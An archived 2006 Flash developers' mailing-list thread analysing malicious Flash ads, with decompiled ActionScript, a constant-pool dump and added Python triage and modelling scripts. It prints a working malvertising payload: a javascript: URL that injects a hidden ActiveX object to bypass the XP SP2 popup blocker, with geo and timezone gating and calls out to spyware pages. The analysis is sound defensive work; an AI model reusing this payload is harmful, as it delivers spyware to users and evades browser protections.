[Flashcoders] Decompiling some sketchy flash code

2006-09-20 Thread Michiel Nolet
Dear List,
 
First off, apologies if this is the wrong forum for this question.  Some 
background -- I'm in the online advertising industry and I've been trying to 
track down and squash a scam that has been hitting the industry.  There is a 
party out there (errorsafe.com) that is embedding some very nasty code in their 
flash ads that, depending on several factors, will pop up a new window and try 
to install their spyware using ActiveX.
 
Here are two sample swf files:
http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf
http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf
 
Now I've been decompiling and extracting code with various tools to try to gain 
some insight.  Interestingly enough, one of them is a little older, and it's 
easier to point blame, as in the 'constants' the following is defined:
 
constants [...some taken out...] 
'http://www.errorsafe.com/pages/scanner/index.php?aid=tiger&lid=swf7&ax=1&ex=1&ed=2',
'http://uk.matchservice.com/reg_swf.php?campaign=tiger', 'easyPP', 
'http://uk.matchservice.com/?aid=tiger&lid=swf7&ax=0', 'tz_begin', 'tz_end', 
'javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u=\'', 
'\',dt=new Date(),tz=-dt.getTimezoneOffset()/60;p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a&&(a.indexOf(\'SP2\')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(!(tz>=',
'&&tz<=', ')){if(p&&!d.getElementById(\'o\')){d.body.innerHTML+=\'<object id=o height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>\';};(i&&p)?o.launchURL(u):w.open(u);};void 0;', 'jscript', 
'\';p=(n.userAgent.indexOf(\'SV1\')!=-1)||(a&&(a.indexOf(\'SP2\')!=-1));i=(d.all&&encodeURI()&&!w.Event);if(p&&!d.getElementById(\'o\')){d.body.innerHTML+=\'<object id=o height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>\';};(i&&p)?o.launchURL(u):w.open(u);void 0;',
'unique:Date', 'Date', 'my_date:Date', 'my_so:SharedObject', '/', 
'tiger_swf7300506', 'SharedObject', 'getLocal', 'tm', 'setFlashCookie', 
'ClickTAG', 'ClickTARGET', '_blank', 'URL_btn', 'onRelease' 
 
The other file seems to have encrypted this information to make it hard to 
track down:
 
'setcookie...', '_level0', 'l2', 'c1', 'l24', 'l1', 'l21', 'l22', 'l23', 'l25', 
'this', 'l27', 't', 'l26', 'u', 'l31', 'l32', 'l28', '_global', 'i', '_ll2', 
'l33', 'l35', ' - ', 'l43', 'l34', 's', '_self', 'l37', 'l36', '??', '', 
'', '???', '???', '???', '?', '', 
'???', '?', 'l29', '???', 'l30', '?', 
'???', '?', '???', 
'?', '?', '??', 
'?ý?ý?ÿÖ?ý?¼?Ù??È?Ù?ý???ý???ÈýÙ?Êý??éò??È?Ù??ÿ?È?Ù¾ÖËË???Ê??ý??Êÿ??Ë?ý???Ë?ÿýË?Ê???Ûý??ÙÎÌÌÏÂ???ÙÂý?ÙÍÂ??ÙÍÂ??ÙξÈ??Ù???¼àý??ÄÅÈ??ÙÉ??Ê???ð???ë?ÄÅËÒÌ×??ĽÄ??ÚÙÉÕÂÂ??ØÙÉÏÅÅ???Ľ?Ê???á??Þ?å?ľ?¾ÅÅ??Êþ???Ê?äðéèÇÙÃØ?þ??ÿ?¼??Ù?¼??Ùø¾Ìø¾¼ÿ?ýÙø¾ßèïåàÖÒÞâÑÎÝÑÎÉÏÕÐÝÉÍÍàÏÉÞÍÑÏÉÌÌßÌÐâÓÕâÝÝÒø¾ÚØË?þ??ÿ?ÚÃ?×?Ê?ý??ÿ?ñîèÄ?Å?ÿý?ÿ?Ä?Å??ÊÄ?Å×ÄÌÅ×??×',
 'l38', '', 'l39', '', 'l40', '?', 'l41', '???', 'l42', 
'??', '?', 'String', 'prototype', '', 'split', 'length', 'charCodeAt', 
'fromCharCode', 'join', 'newMenu', 'ContextMenu', 'hideBuiltInItems', 'menu', 
'Date', 'epru2003intl592006', 'b', ' : ', '_ll1', 'ClickTAG', 
'http://workhomecenter.com/?aid=istem&lid=intl', 'ClickTARGET', '_blank'
 
So I'm kind of at a loss as to how to figure out what this flash file does.  
They've clearly masked their code quite well to make it very difficult to see.  
I do know a few things:
 
- The file loads an outside html file, which checks the user's IP address and, 
depending on the geo that IP matches to, returns a 1/0 value (or in some cases 
an encrypted 'yes/no') as to whether or not to serve a pop.
- The flash file also checks the timezone of the browser in addition to IP as 
an added check that the user is outside the US.
 
Any insight?  Again, apologies if this is the wrong list to ask and I will 
greatly appreciate direction if it isn't!  
 
-Mike
___
Flashcoders@chattyfig.figleaf.com
To change your subscription options or search the archive:
http://chattyfig.figleaf.com/mailman/listinfo/flashcoders

Brought to you by Fig Leaf Software
Premier Authorized Adobe Consulting and Training
http://www.figleaf.com
http://training.figleaf.com
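
The 'constants' dump above is what an ActionConstantPool record inside a DoAction tag carries, so the URLs and the javascript: payload can be listed without a full decompiler. The script below is an added example, not code from this thread or from any of the tools it mentions. It reads the SWF header (inflating CWS files), walks the tag stream including DefineSprite containers, collects every string operand from ActionConstantPool, ActionPush and ActionGetURL records, and flags URLs, javascript: URLs, ActiveX CLSIDs, and the charCodeAt/fromCharCode pair that shows strings are decoded at runtime, as in the second file. The sample SWF it builds is constructed here with a placeholder hostname; the CLSID in it is the one from the dump.

```python
import re
import struct
import zlib

TAG_END, TAG_DO_ACTION, TAG_DEFINE_SPRITE = 0, 12, 39
ACTION_GET_URL, ACTION_CONSTANT_POOL, ACTION_PUSH = 0x83, 0x88, 0x96
# ActionPush value types with a fixed size (float, null, undefined, register, bool, double, int, const8, const16)
PUSH_SIZES = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}

def _cstr(buf, pos):
    """Read a NUL-terminated string; SWF strings are raw bytes, so decode as latin-1."""
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1

def action_strings(code):
    """Every string operand in one action block: ConstantPool entries, pushed strings, GetURL targets."""
    found, pos = [], 0
    while pos < len(code):
        op, pos = code[pos], pos + 1
        if op < 0x80:                        # actions below 0x80 (ActionEnd included) carry no operands
            continue
        (length,) = struct.unpack_from("<H", code, pos)
        data, pos = code[pos + 2:pos + 2 + length], pos + 2 + length
        if op == ACTION_CONSTANT_POOL:
            (count,) = struct.unpack_from("<H", data, 0)
            p = 2
            for _ in range(count):
                s, p = _cstr(data, p)
                found.append(s)
        elif op == ACTION_PUSH:              # sequence of (type, value) pairs
            p = 0
            while p < len(data):
                kind, p = data[p], p + 1
                if kind == 0:                # type 0 is a NUL-terminated string
                    s, p = _cstr(data, p)
                    found.append(s)
                elif kind in PUSH_SIZES:
                    p += PUSH_SIZES[kind]
                else:                        # unknown type: stop scanning this push
                    break
        elif op == ACTION_GET_URL:           # NUL-terminated URL, then NUL-terminated target
            found.append(_cstr(data, 0)[0])
    return found

def swf_tags(body, pos):
    """Yield (type, data) for each tag in a tag stream starting at pos."""
    while pos + 2 <= len(body):
        (hdr,) = struct.unpack_from("<H", body, pos)
        tag, length, pos = hdr >> 6, hdr & 0x3F, pos + 2
        if length == 0x3F:                   # long-form header: 32-bit length follows
            (length,) = struct.unpack_from("<I", body, pos)
            pos += 4
        yield tag, body[pos:pos + length]
        pos += length
        if tag == TAG_END:
            break

def swf_strings(blob):
    """Inflate a CWS/FWS file and collect action strings from every DoAction tag, sprites included."""
    assert blob[:3] in (b"FWS", b"CWS"), "not a SWF"
    body = zlib.decompress(blob[8:]) if blob[:3] == b"CWS" else blob[8:]
    nbits = body[0] >> 3                     # RECT: 5-bit width, then four fields of that width
    pos = (5 + 4 * nbits + 7) // 8 + 4       # skip RECT, frame rate (u16) and frame count (u16)
    found = []
    def walk(buf, start):
        for tag, data in swf_tags(buf, start):
            if tag == TAG_DO_ACTION:
                found.extend(action_strings(data))
            elif tag == TAG_DEFINE_SPRITE:   # u16 id, u16 frame count, then nested tags
                walk(data, 4)
    walk(body, pos)
    return found

def triage(strings):
    """URLs, javascript: payloads, ActiveX CLSIDs, and the charCodeAt/fromCharCode pair that means runtime decoding."""
    return {
        "urls": [s for s in strings if s.lower().startswith(("http://", "https://"))],
        "script_urls": [s for s in strings if "javascript:" in s.lower()],
        "clsids": sorted({m.upper() for s in strings
                          for m in re.findall(r"clsid:([0-9a-f-]{36})", s, re.I)}),
        "runtime_decoding": {"charCodeAt", "fromCharCode"} <= set(strings),
    }

def build_sample_swf(compress=False):
    """Constructed input: one DoAction tag whose constant pool is shaped like the dump above (placeholder host)."""
    pool = [b"http://ads.example.invalid/reg.php?campaign=test",
            b"javascript:d.body.innerHTML+='<object id=o classid=\"CLSID:6BF52A52-394A-11D3-"
            b"B153-00C04F79FAA6\"></object>';o.launchURL(u);void 0;",
            b"charCodeAt", b"fromCharCode"]
    pool_data = struct.pack("<H", len(pool)) + b"".join(s + b"\x00" for s in pool)
    push_data = b"\x00_blank\x00\x08\x00"    # one pushed string, then constant8 index 0
    actions = (bytes([ACTION_CONSTANT_POOL]) + struct.pack("<H", len(pool_data)) + pool_data
               + bytes([ACTION_PUSH]) + struct.pack("<H", len(push_data)) + push_data + b"\x00")
    tags = (struct.pack("<H", (TAG_DO_ACTION << 6) | 0x3F) + struct.pack("<I", len(actions))
            + actions + struct.pack("<H", 0))    # long-form DoAction header, then the End tag
    body = b"\x00" + struct.pack("<HH", 12 << 8, 1) + tags   # empty RECT, 12 fps, one frame
    head = (b"CWS" if compress else b"FWS") + bytes([7]) + struct.pack("<I", 8 + len(body))
    return head + (zlib.compress(body) if compress else body)
```

Against a real file call triage(swf_strings(open(path, "rb").read())). The script does not walk DefineButton2 actions or PlaceObject2 clip actions, and a file whose pool is just 'l1', 'l2', ... plus charCodeAt/fromCharCode (like the second sample above) will show little more than the runtime_decoding flag, so a quiet result from this alone does not clear an ad.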


RE: [Flashcoders] Decompiling some sketchy flash code

2006-09-20 Thread Michiel Nolet
All I see on decompiling is things like:

  var eval (\x01) = 930;
while (while (while (while (while (while (while (while (while (while
(while (while (while (while (while (while (while (while (eval (\x01)
== 930) {
eval (\x01) = eval (\x01) - 695}
 , eval (\x01) == 67) {
eval (\x01) = eval (\x01) + 718// branch @1
}
 , eval (\x01) == 349) {
eval (\x01) = eval (\x01) + 149// branch @1
}
 , eval (\x01) == 264) {
eval (\x01) = eval (\x01) + 84}

Am I missing something?

-Mike 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Stuhr
Sent: Wednesday, September 20, 2006 5:05 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code

Michiel Nolet schrieb:
 Dear List,
  
 First off, apologies if this is the wrong forum for this question.
Some background -- I'm in the online advertising industry and I've been
trying to track down and squash a scam that has been hitting the
industry.  There is a party out there (errorsafe.com) that is embedding
some very nasty code in their flash ads that, depending on several
factors, will pop up a new window and try to install their spyware using
ActiveX.
  
 Here are two sample swf files:
 http://content.yieldmanager.com/13312/94749/27e558c94df509ebe888fdc0060640e8.swf
 http://content.yieldmanager.com/17344/138497/6d4ef47cf4071557d6749ad9c2fcf8cc.swf
  
   
i tried to decompile them with asv (latest version). i can clearly see
what is inside there. i would give you the rebuild files, but maybe you
should ask burak himself (he is on this list) to give you those.


micha


RE: [Flashcoders] Decompiling some sketchy flash code

2006-09-20 Thread Michiel Nolet
I am more than willing to shell out $59.95 for asv, I just want to make sure
it can extract stuff that other tools couldn't.  I've tried the free
command line ones, and shelled out $30 for some crappy software that plain
didn't work.  Could you copy-paste some sample lines of more informative
code you're finding?

-Mike

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Stuhr
Sent: Wednesday, September 20, 2006 6:11 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code

Michiel Nolet schrieb:
 All I see on decompiling is things like:

   var eval (\x01) = 930;
 while (while (while (while (while (while (while (while (while 
 (while (while (while (while (while (while (while (while (while (eval 
 (\x01) == 930) {
 eval (\x01) = eval (\x01) - 695}
  , eval (\x01) == 67) {
 eval (\x01) = eval (\x01) + 718// branch @1
 }
  , eval (\x01) == 349) {
 eval (\x01) = eval (\x01) + 149// branch @1
 }
  , eval (\x01) == 264) {
 eval (\x01) = eval (\x01) + 84}

 Am I missing something?

   
sure

buy a copy of asv and you get the full experience :-)

micha


RE: [Flashcoders] Decompiling some sketchy flash code

2006-09-20 Thread Michiel Nolet
Not at all, that is awesome, you don't understand how many hours I've
been trying to find that info.  I also have plenty more flash files to
get the code from :).  It's actually kind of interesting that they use
javascript that checks useragent, timezone, etc. on whether a pop should
be launched or not.

Burak, can I contact you at manitu at buraks.com ?

-Mike



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Stuhr
Sent: Wednesday, September 20, 2006 6:52 PM
To: Flashcoders mailing list
Subject: Re: [Flashcoders] Decompiling some sketchy flash code

Michiel Nolet schrieb:
 I am more than willing to shell out $59.95 for asv, I just want to make 
 sure it can extract stuff that other tools couldn't.  I've tried the 
 free command line ones, and shelled out $30 for some crappy software 
 that plain didn't work.  Could you copy-paste some sample lines of 
 more informative code you're finding?


function setFlashCookie() {
    // The list archive replaced "fl" with "swf" in identifiers (setswfashCookie,
    // swfush) and stripped <, >, & and " characters; both are restored here.
    // Frequency cap: remember in a local SharedObject when the pop was last tried.
    my_date.setTime(my_date.getTime() + 43200);
    my_so.data.expires = my_date.getTime();
    my_so.flush();
    if (_root.strong) {
        // Ask the remote geo script whether to pop; it answers popup=1 or popup=0.
        this.createEmptyMovieClip("target_mc", this.getNextHighestDepth());
        target_mc.unique = unique.getTime();
        target_mc.loadVariables(_root.sscript, "GET");
        target_mc.param_interval = setInterval(checkParamsLoaded, 100);
    }
}
function checkParamsLoaded() {
    if (target_mc.popup == undefined) {
        // geo script has not answered yet; keep polling
    } else if (target_mc.popup == 1) {
        clearInterval(target_mc.param_interval);
        getURL(_root.tzjscript, "_self");   // runs the javascript: URL in the host page
    } else if (target_mc.popup == 0) {
        clearInterval(target_mc.param_interval);
    }
}
_root.strong = true;
_root.strongPP = ###;
_root.sscript = ###;
_root.easyPP = ###;
_root.tz_begin = -3;
_root.tz_end = -9;
// Pop only outside the tz_end..tz_begin window; when the SV1 / SP2 marker is
// present, inject a hidden ActiveX object and call its launchURL instead of
// window.open.
_root.tzjscript = "javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='"
    + _root.strongPP
    + "',dt=new Date(),tz=-dt.getTimezoneOffset()/60;"
    + "p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));"
    + "i=(d.all&&encodeURI()&&!w.Event);"
    + "if(!(tz>=" + _root.tz_end + "&&tz<=" + _root.tz_begin + ")){"
    + "if(p&&!d.getElementById('o')){d.body.innerHTML+='<object id=o height=\"0\" "
    + "classid=\"CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\"></object>';};"
    + "(i&&p)?o.launchURL(u):w.open(u);};void 0;";
// Same payload without the timezone check.
_root.jscript = "javascript:var w=window,n=navigator,a=n.appMinorVersion,d=document,u='"
    + _root.strongPP
    + "';p=(n.userAgent.indexOf('SV1')!=-1)||(a&&(a.indexOf('SP2')!=-1));"
    + "i=(d.all&&encodeURI()&&!w.Event);"
    + "if(p&&!d.getElementById('o')){d.body.innerHTML+='<object id=o height=\"0\" "
    + "classid=\"CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6\"></object>';};"
    + "(i&&p)?o.launchURL(u):w.open(u);void 0;";
var unique:Date = new Date();
var my_date:Date = new Date();
var my_so:SharedObject = SharedObject.getLocal("tiger_swf7300506", "/");
if (my_so.data.expires != undefined) {
    var tm = my_date.getTime();
    if (tm > my_so.data.expires) {
        setFlashCookie();
    }
} else {
    setFlashCookie();
}
if (_root.ClickTAG == undefined) {
    _root.ClickTAG = _root.easyPP;
}
if (_root.ClickTARGET == undefined) {
    _root.ClickTARGET = "_blank";
}
_root.URL_btn.onRelease = function () {
    getURL(_root.ClickTAG, _root.ClickTARGET);
};

those ###'s are real urls.

and those are only the actions on frame 1 ...

i guess you lost ~60 bucks right now :-)

micha
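
Read as a whole, the frame-1 code in the message above is a gate: the geo script's popup flag, then the timezone window, then the SV1 / SP2 test that decides between window.open and the launchURL method of the injected control (the CLSID 6BF52A52-394A-11D3-B153-00C04F79FAA6 is the Windows Media Player ActiveX control, and launchURL on it opens a URL from script, which is how the ad gets past the XP SP2 popup blocker). The following Python is an added example, not code from the thread; it models that gate so the targeting can be checked against sample visitors. The Visitor fields, the default window values and the two user-agent strings are assumptions constructed here.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Visitor:
    """What the injected script can see about the browser, plus the geo script's answer."""
    user_agent: str                    # navigator.userAgent
    app_minor_version: Optional[str]   # navigator.appMinorVersion (IE only; None in other browsers)
    tz_offset_minutes: int             # Date.getTimezoneOffset(): minutes behind UTC, 300 for US Eastern
    is_ie: bool                        # the script's i: document.all present and window.Event absent
    geo_popup: Optional[int]           # the popup variable loaded from _root.sscript (None = not loaded)

def has_sp2_popup_blocker(v):
    """The script's p: IE on Windows XP SP2 announces itself with SV1 in the UA or SP2 in appMinorVersion."""
    return "SV1" in v.user_agent or bool(v.app_minor_version and "SP2" in v.app_minor_version)

def popup_plan(v, tz_begin=-3, tz_end=-9):
    """How the ad would open its URL for this visitor: 'o.launchURL', 'window.open', or None."""
    if v.geo_popup != 1:                       # checkParamsLoaded runs tzjscript only on popup == 1
        return None
    tz = -v.tz_offset_minutes / 60             # hours east of UTC, as in tz=-dt.getTimezoneOffset()/60
    if tz_end <= tz <= tz_begin:               # UTC-9 .. UTC-3 is treated as a US visitor: stay quiet
        return None
    if v.is_ie and has_sp2_popup_blocker(v):   # i && p: go through the injected ActiveX control
        return "o.launchURL"
    return "window.open"                       # everyone else gets a plain popup

# Constructed visitors; the user-agent strings are samples, not captured traffic.
IE6_SP2 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
FIREFOX = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"

def sample_visitors():
    """The four cases worth checking: UK IE on SP2, US IE on SP2, UK Firefox, and geo says no."""
    return {
        "uk_ie_sp2": Visitor(IE6_SP2, "SP2;", -60, True, 1),
        "us_ie_sp2": Visitor(IE6_SP2, "SP2;", 300, True, 1),
        "uk_firefox": Visitor(FIREFOX, None, -60, False, 1),
        "uk_ie_sp2_geo_no": Visitor(IE6_SP2, "SP2;", -60, True, 0),
    }
```

The timezone window is the second US filter the original poster noticed: a US visitor whose IP the geo script misclassifies still reports an offset between UTC-9 and UTC-3 and is skipped, while a UK IE user on SP2 is sent through launchURL.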